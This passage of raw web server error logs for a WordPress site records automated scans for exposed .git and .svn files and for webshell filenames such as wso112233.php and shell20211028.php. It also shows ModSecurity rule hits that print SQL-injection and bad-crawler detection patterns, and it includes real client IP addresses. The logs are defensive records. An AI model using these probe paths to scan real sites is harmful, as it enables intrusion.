msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "User-Agent"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZcEO6INW6G5xT9rfXujvZQAAAMI"] [Tue Feb 06 11:25:51.472071 2024] [:error] [pid 15479:tid 139792587122432] [client 37.221.92.12:57008] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 06 11:25:51.596081 2024] [:error] [pid 15478:tid 139792754784000] [client 37.221.92.12:57010] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 06 11:27:17.481364 2024] [autoindex:error] [pid 16197:tid 139792645871360] [client 37.221.92.12:57108] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 06 17:59:03.211982 2024] [:error] [pid 15479:tid 139792587122432] [client 109.72.127.188:40986] [client 109.72.127.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:comment. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: From February 2024, all existing email autoresponders will become obsolete!\\x0d\\x0a\\x0d\\x0aIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you\\xe2\\x80\\x99ll need to comply with Gmail\\xe2\\x80\\x99s and Yahoo\\xe2\\x80\\x99s draconic new directives.\\x0d\\x0a \\x0d\\x0aThey require regular marketers like you and I to setup complex code on sending domains\\xe2\\x80\\xa6 and existing autoresponders like Aweber and GetResponse are no..."] [hostname "investigacionperu.com"] [uri "/wp-comments-post.php"] [unique_id "ZcK5t_2BDYr9ZD9KgUDu-AAAAIw"] 2024/02/07 00:15:35 [error] 15433#15433: *315818 access forbidden by rule, client: 35.153.135.1, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Feb 07 03:02:16.163076 2024] [:error] [pid 16197:tid 139792629085952] [client 206.189.143.129:48156] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/samll.php, referer: investigacionperu.com [Wed Feb 07 03:05:06.643839 2024] [:error] [pid 16197:tid 139792536766208] [client 206.189.143.129:48200] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/samll.php, referer: investigacionperu.com [Wed Feb 07 15:01:23.845110 2024] [:error] [pid 25011:tid 140716298671872] [client 179.43.191.18:35044] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 07 15:01:24.189405 2024] [:error] [pid 25011:tid 140716256708352] [client 179.43.191.18:35046] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Feb 09 15:26:28.194239 2024] [autoindex:error] [pid 26571:tid 140317160326912] [client 141.94.87.67:36640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core/Poly1305/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/sodium_compat/src/Core/Poly1305/index.php [Fri Feb 09 15:26:30.056247 2024] [autoindex:error] [pid 27183:tid 140317177112320] [client 141.94.87.67:36646] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core/Poly1305/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/sodium_compat/src/Core/Poly1305/index.php [Fri Feb 09 15:26:30.224715 2024] [autoindex:error] [pid 26687:tid 140317143541504] [client 141.94.87.67:36650] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core/Poly1305/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/sodium_compat/src/Core/Poly1305/index.php [Fri Feb 09 23:15:27.098089 2024] [autoindex:error] [pid 26571:tid 140317252646656] [client 192.185.81.192:45922] AH01276: Cannot serve directory /home/investig/public_html/wp-content/plugins/woocommerce/includes/traits/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/plugins/woocommerce/includes/traits/index.php [Sat Feb 10 08:33:05.306877 2024] [autoindex:error] [pid 4079:tid 140219497342720] [client 45.138.16.65:52694] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/02/10 11:22:47 [error] 3412#3412: *374118 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /api/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 12:31:18 [error] 3412#3412: *374776 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /test/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 13:20:18 [error] 3412#3412: *375150 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /app/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 13:24:37 [error] 3413#3413: *375170 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /api/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 14:34:54 [error] 3413#3413: *375639 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /web/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 14:40:11 [error] 3413#3413: *375686 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /templates/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 15:08:05 [error] 3412#3412: *376100 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 15:27:27 [error] 3412#3412: *376196 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /admin/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 16:00:08 [error] 3412#3412: *376424 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /core/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 16:32:41 [error] 3412#3412: *376627 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /app/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 16:38:24 [error] 3412#3412: *376650 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /admin/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 16:43:10 [error] 3412#3412: *376675 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /dev/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Feb 10 17:48:46.390625 2024] [autoindex:error] [pid 3454:tid 140219340781312] [client 93.113.111.132:34618] AH01276: Cannot serve directory /home/investig/public_html/wp-content/plugins/woocommerce/includes/shortcodes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/plugins/woocommerce/includes/shortcodes/index.php 2024/02/10 18:05:15 [error] 3413#3413: *379963 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /client/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 18:16:38 [error] 3413#3413: *380060 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /templates/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 18:40:06 [error] 3413#3413: *380263 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /dev/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 19:33:10 [error] 3413#3413: *380893 access forbidden by rule, client: 37.148.161.141, server: investigacionperu.com, request: "GET /.svn/entries HTTP/1.1", host: "investigacionperu.com" 2024/02/10 19:33:10 [error] 3412#3412: *380894 access forbidden by rule, client: 37.148.161.141, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2024/02/10 19:52:23 [error] 3412#3412: *381024 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /frontend/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 21:02:26 [error] 3413#3413: *381554 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /assets/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 21:09:32 [error] 3412#3412: *381586 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /client/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 21:27:47 [error] 3413#3413: *381709 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /test/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 21:32:04 [error] 3413#3413: *381727 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /frontend/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/10 22:19:16 [error] 3413#3413: *382048 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 22:36:58 [error] 3413#3413: *382145 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /assets/.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/02/10 22:41:52 [error] 3412#3412: *382169 access forbidden by rule, client: 3.89.132.23, server: webmail.investigacionperu.com, request: "GET /web/.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/02/11 00:14:48 [error] 3412#3412: *382851 access forbidden by rule, client: 3.90.140.14, server: investigacionperu.com, request: "GET /core/.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Sun Feb 11 08:39:22.893100 2024] [:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:50426] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sun Feb 11 08:39:22.893157 2024] [:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:50426] Stack trace: [Sun Feb 11 08:39:22.893167 2024] [:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:50426] #0 {main} [Sun Feb 11 08:39:22.893233 2024] [:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:50426] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Sun Feb 11 08:39:50.514375 2024] [:error] [pid 8731:tid 140220699744000] [client 74.234.93.101:50512] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Sun Feb 11 08:39:54.632161 2024] [:error] [pid 7845:tid 140220699744000] [client 74.234.93.101:50528] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Feb 11 08:40:00.271587 2024] [:error] [pid 7845:tid 140220582246144] [client 74.234.93.101:50546] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Feb 11 08:42:02.279206 2024] [:error] [pid 7843:tid 140220741707520] [client 74.234.93.101:50884] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Sun Feb 11 08:42:08.530786 2024] [:error] [pid 8731:tid 140220615816960] [client 74.234.93.101:50904] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/x.php [Sun Feb 11 08:43:00.513017 2024] [:error] [pid 7845:tid 140220607424256] [client 74.234.93.101:51072] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ssl.php [Sun Feb 11 08:43:24.496561 2024] [:error] [pid 7843:tid 140220657780480] [client 74.234.93.101:51136] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 11 08:43:25.239253 2024] [:error] [pid 8731:tid 140220649387776] [client 74.234.93.101:51140] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 11 08:43:39.937272 2024] [:error] [pid 7844:tid 140220590638848] [client 74.234.93.101:51186] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Sun Feb 11 08:43:45.347937 2024] [:error] [pid 7844:tid 140220640995072] [client 74.234.93.101:51206] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Sun Feb 11 08:43:50.087982 2024] [:error] [pid 7845:tid 140220674565888] [client 74.234.93.101:51222] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Sun Feb 11 08:44:11.149075 2024] [:error] [pid 7843:tid 140220557068032] [client 74.234.93.101:51286] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 11 08:44:11.212728 2024] [:error] [pid 8731:tid 140220615816960] [client 74.234.93.101:51288] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 11 08:44:27.029676 2024] [:error] [pid 7844:tid 140220674565888] [client 74.234.93.101:51338] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/404.php [Sun Feb 11 08:44:34.059310 2024] [autoindex:error] [pid 7845:tid 140220599031552] [client 74.234.93.101:51360] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/02/11 08:44:34 [error] 7803#7803: *388484 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.234.93.101, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/02/11 08:44:34 [error] 7803#7803: *388484 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.234.93.101, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Sun Feb 11 08:44:35.009066 2024] [autoindex:error] [pid 7844:tid 140220699744000] [client 74.234.93.101:51364] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:37.254926 2024] [autoindex:error] [pid 7844:tid 140220557068032] [client 74.234.93.101:51374] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.038243 2024] [autoindex:error] [pid 7844:tid 140220590638848] [client 74.234.93.101:51378] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.101891 2024] [autoindex:error] [pid 7844:tid 140220599031552] [client 74.234.93.101:51380] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.166295 2024] [autoindex:error] [pid 7844:tid 140220640995072] [client 74.234.93.101:51382] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.230155 2024] [autoindex:error] [pid 7845:tid 140220716529408] [client 74.234.93.101:51384] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.358492 2024] [autoindex:error] [pid 7845:tid 140220750100224] [client 74.234.93.101:51388] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.422996 2024] [autoindex:error] [pid 8731:tid 140220733314816] [client 74.234.93.101:51390] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.487493 2024] [autoindex:error] [pid 7843:tid 140220607424256] [client 74.234.93.101:51392] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.550764 2024] [autoindex:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:51394] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.614876 2024] [autoindex:error] [pid 8731:tid 140220666173184] [client 74.234.93.101:51396] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.748620 2024] [:error] [pid 8731:tid 140220682958592] [client 74.234.93.101:51398] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Feb 11 08:44:38.748858 2024] [:error] [pid 8731:tid 140220682958592] [client 74.234.93.101:51398] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Feb 11 08:44:38.749054 2024] [:error] [pid 8731:tid 140220682958592] [client 74.234.93.101:51398] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Feb 11 08:44:38.749245 2024] [:error] [pid 8731:tid 140220682958592] [client 74.234.93.101:51398] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Feb 11 08:44:38.817370 2024] [autoindex:error] [pid 7844:tid 140220624209664] [client 74.234.93.101:51400] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.881644 2024] [autoindex:error] [pid 7845:tid 140220548675328] [client 74.234.93.101:51402] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:38.945605 2024] [autoindex:error] [pid 7844:tid 140220649387776] [client 74.234.93.101:51404] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.008878 2024] [autoindex:error] [pid 7844:tid 140220615816960] [client 74.234.93.101:51406] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.074014 2024] [autoindex:error] [pid 7844:tid 140220691351296] [client 74.234.93.101:51408] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.137482 2024] [autoindex:error] [pid 7845:tid 140220733314816] [client 74.234.93.101:51410] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.202429 2024] [autoindex:error] [pid 7845:tid 140220708136704] [client 74.234.93.101:51412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.271291 2024] [autoindex:error] [pid 7845:tid 140220724922112] [client 74.234.93.101:51414] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:39.334884 2024] [autoindex:error] [pid 7844:tid 140220708136704] [client 74.234.93.101:51416] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:44:42.405975 2024] [autoindex:error] [pid 7843:tid 140220599031552] [client 74.234.93.101:51428] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:06.847377 2024] [autoindex:error] [pid 7845:tid 140220691351296] [client 74.234.93.101:51494] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:06.911301 2024] [autoindex:error] [pid 7845:tid 140220741707520] [client 74.234.93.101:51496] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex 